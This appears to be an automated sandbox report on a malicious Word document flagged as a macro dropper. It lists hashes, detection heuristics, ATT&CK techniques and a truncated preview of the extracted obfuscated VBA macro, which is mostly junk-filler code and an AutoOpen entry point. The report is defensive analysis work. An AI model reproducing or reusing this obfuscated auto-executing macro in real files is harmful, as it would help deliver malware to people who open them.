Office (OLE) malware analysis — malicious · 38e790bd07cd5f4f

MALICIOUS

Office (OLE)

159.0 KB Created: 2018-04-26 19:47:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: b4a09c8b5705427d4cdab9b0f357cdec SHA-1: 1f7a7e7e280b35cc31cfc35fc684a16b7d12605a SHA-256: 38e790bd07cd5f4fe844f600f44fccadf0842eac6977c1a3f17b3a3c6b792ef5

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is identified as malicious by ClamAV with the signature 'Doc.Dropper.Agent-6520300-0'. Static analysis revealed the presence of a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon document opening. The critical heuristic firing for a Shell() call within the VBA code strongly suggests that the macro is designed to download and execute a second-stage payload.

Heuristics 6

ClamAV: Doc.Dropper.Agent-6520300-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6520300-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 51524 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	51524 bytes
SHA-256: `55f9471412d1ed0d67fe489fd0e8a32913ca0a3dfaeec72e2dfce79a926731fb`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "faIrjMMPpimGkB" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub rvziDh(OEmAWw) Select Case zEAGzn Case 32655 koRJsW = WFTNSw objUzq = Round(45942) jrtFG = Hex(VUuLfE - ChrW(INuoW)) hhjJih = QYZcp Case 50260 iFaPm = CByte(30343) BlYBn = Log(dfOmja) End Select End Sub Sub qUChP(zKzuS) Select Case FobDn Case 58249 HkjwH = rnjkJ wOVZOC = Round(85466) OSqEq = Hex(ihFBb - ChrW(IiTUKX)) ZXlQan = VIkPN Case 2483 dnotbG = CByte(1891) JhfIhf = Log(uBOqG) End Select Select Case cdCQQ Case 66928 Wzpnaj = qfaiRu ODlRGc = Round(7279) iAWub = Hex(KmdLX - ChrW(HMrri)) AbPaj = MXOZR Case 98222 GjJOp = CByte(32181) FijtzX = Log(ioBMtj) End Select Select Case bcwHU Case 96416 DlkUiA = jwzCb vWuVd = Round(18112) ijNMXP = Hex(fEKGU - ChrW(wBsvY)) WdupD = ShKEh Case 54335 KTzTYX = CByte(94212) vlfnr = Log(IDtiwz) End Select End Sub Sub mAnuJ(FhvaW) Select Case cJwwiT Case 46339 EbsPCM = JiQaji YTLZP = Round(41103) jzLIEP = Hex(JEKKa - ChrW(GLHXr)) ZwDiAm = IlfmI Case 9430 kXbhH = CByte(95306) FzZFPI = Log(NNLoh) End Select Select Case vudVL Case 41582 GliRC = Xmija uzUwd = Round(47483) ivvYTw = Hex(mGpuGW - ChrW(wrTUHD)) lWidk = nSbwz Case 93416 rEKMLT = CByte(51784) QwncE = Log(zIAbVU) End Select End Sub Sub Autoopen() On Error Resume Next Select Case sZQui Case 52558 UfrvJv = rjGJoc UZqBjs = Round(80862) bWdbB = Hex(fuScrn - ChrW(lFsSJl)) ctSjs = YAZtBj Case 95397 DVRit = CByte(90559) mojwp = Log(iUwiXG) End Select WFIiJlvJ (hhEwjT + XAcwAvYni + iUYaIp) Select Case hkbkPq Case 86455 ElkCnp = bLicNd QUwaU = Round(64936) QGozH = Hex(kWzIQ - ChrW(rdTMhf)) wsMwjc = LTGlo Case 41559 XoivC = CByte(62731) wENVLV = Log(szHRuj) End Select End Sub Sub ZDJIXz(QPLTuj) Select Case ooRiz Case 94440 nwaUG = SVwUu cwkVnf = Round(67507) foCCQp = Hex(EJqmu - ChrW(jlEjnQ)) XuRrY = EWETd Case 99295 zXwwY = CByte(6583) GOMHh = Log(zvMflz) End Select Select Case JakXK Case 56520 lvzpN = inImIL zSJhJJ = Round(48532) IJZhi = Hex(GZmblu - ChrW(jLOWuu)) MnZXa = PrQCO Case 2588 wdlaI = CByte(67686) XOVLW = Log(pSGuL) End Select Select Case OEwVj Case 3834 OVPIk = kqwDa OLszwR = Round(26640) JawkW = Hex(zmABHB - ChrW(BUjIF)) zlasPj = wDVGw Case 7748 BwoYf = CByte(73215) NzqvvY = Log(NrMos) End Select End Sub Sub OPjhhD(uvQtC) Select Case fXEfH Case 55812 slnjz = IqjMJ GYHlM = Round(13624) cWzRhz = Hex(rssILF - ChrW(YmdbA)) NuZLjH = wfYlrY Case 30101 zuUGm = CByte(9843) PzaAEG = Log(liJMWi) End Select End Sub Attribute VB_Name = "wmhZWvMUHQnp" Sub asIVO(kfckiD) Select Case Otubi Case 3340 TBImhP = QvqKN vHtVo = Round(96940) tBTBwV = Hex(hSafl - ChrW(ErZkWn)) WUjmaV = YGAYmj Case 204 ... (truncated)

SHA-256: 55f9471412d1ed0d67fe489fd0e8a32913ca0a3dfaeec72e2dfce79a926731fb

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "faIrjMMPpimGkB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub rvziDh(OEmAWw)
Select Case zEAGzn
         Case 32655
            koRJsW = WFTNSw
            objUzq = Round(45942)
            jrtFG = Hex(VUuLfE - ChrW(INuoW))
            hhjJih = QYZcp
         Case 50260
            iFaPm = CByte(30343)
            BlYBn = Log(dfOmja)
End Select
End Sub
Sub qUChP(zKzuS)
Select Case FobDn
         Case 58249
            HkjwH = rnjkJ
            wOVZOC = Round(85466)
            OSqEq = Hex(ihFBb - ChrW(IiTUKX))
            ZXlQan = VIkPN
         Case 2483
            dnotbG = CByte(1891)
            JhfIhf = Log(uBOqG)
End Select
Select Case cdCQQ
         Case 66928
            Wzpnaj = qfaiRu
            ODlRGc = Round(7279)
            iAWub = Hex(KmdLX - ChrW(HMrri))
            AbPaj = MXOZR
         Case 98222
            GjJOp = CByte(32181)
            FijtzX = Log(ioBMtj)
End Select
Select Case bcwHU
         Case 96416
            DlkUiA = jwzCb
            vWuVd = Round(18112)
            ijNMXP = Hex(fEKGU - ChrW(wBsvY))
            WdupD = ShKEh
         Case 54335
            KTzTYX = CByte(94212)
            vlfnr = Log(IDtiwz)
End Select
End Sub
Sub mAnuJ(FhvaW)
Select Case cJwwiT
         Case 46339
            EbsPCM = JiQaji
            YTLZP = Round(41103)
            jzLIEP = Hex(JEKKa - ChrW(GLHXr))
            ZwDiAm = IlfmI
         Case 9430
            kXbhH = CByte(95306)
            FzZFPI = Log(NNLoh)
End Select
Select Case vudVL
         Case 41582
            GliRC = Xmija
            uzUwd = Round(47483)
            ivvYTw = Hex(mGpuGW - ChrW(wrTUHD))
            lWidk = nSbwz
         Case 93416
            rEKMLT = CByte(51784)
            QwncE = Log(zIAbVU)
End Select
End Sub
Sub Autoopen()
On Error Resume Next
Select Case sZQui
         Case 52558
            UfrvJv = rjGJoc
            UZqBjs = Round(80862)
            bWdbB = Hex(fuScrn - ChrW(lFsSJl))
            ctSjs = YAZtBj
         Case 95397
            DVRit = CByte(90559)
            mojwp = Log(iUwiXG)
End Select
WFIiJlvJ (hhEwjT + XAcwAvYni + iUYaIp)
Select Case hkbkPq
         Case 86455
            ElkCnp = bLicNd
            QUwaU = Round(64936)
            QGozH = Hex(kWzIQ - ChrW(rdTMhf))
            wsMwjc = LTGlo
         Case 41559
            XoivC = CByte(62731)
            wENVLV = Log(szHRuj)
End Select
End Sub
Sub ZDJIXz(QPLTuj)
Select Case ooRiz
         Case 94440
            nwaUG = SVwUu
            cwkVnf = Round(67507)
            foCCQp = Hex(EJqmu - ChrW(jlEjnQ))
            XuRrY = EWETd
         Case 99295
            zXwwY = CByte(6583)
            GOMHh = Log(zvMflz)
End Select
Select Case JakXK
         Case 56520
            lvzpN = inImIL
            zSJhJJ = Round(48532)
            IJZhi = Hex(GZmblu - ChrW(jLOWuu))
            MnZXa = PrQCO
         Case 2588
            wdlaI = CByte(67686)
            XOVLW = Log(pSGuL)
End Select
Select Case OEwVj
         Case 3834
            OVPIk = kqwDa
            OLszwR = Round(26640)
            JawkW = Hex(zmABHB - ChrW(BUjIF))
            zlasPj = wDVGw
         Case 7748
            BwoYf = CByte(73215)
            NzqvvY = Log(NrMos)
End Select
End Sub
Sub OPjhhD(uvQtC)
Select Case fXEfH
         Case 55812
            slnjz = IqjMJ
            GYHlM = Round(13624)
            cWzRhz = Hex(rssILF - ChrW(YmdbA))
            NuZLjH = wfYlrY
         Case 30101
            zuUGm = CByte(9843)
            PzaAEG = Log(liJMWi)
End Select
End Sub

Attribute VB_Name = "wmhZWvMUHQnp"
Sub asIVO(kfckiD)
Select Case Otubi
         Case 3340
            TBImhP = QvqKN
            vHtVo = Round(96940)
            tBTBwV = Hex(hSafl - ChrW(ErZkWn))
            WUjmaV = YGAYmj
         Case 204
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.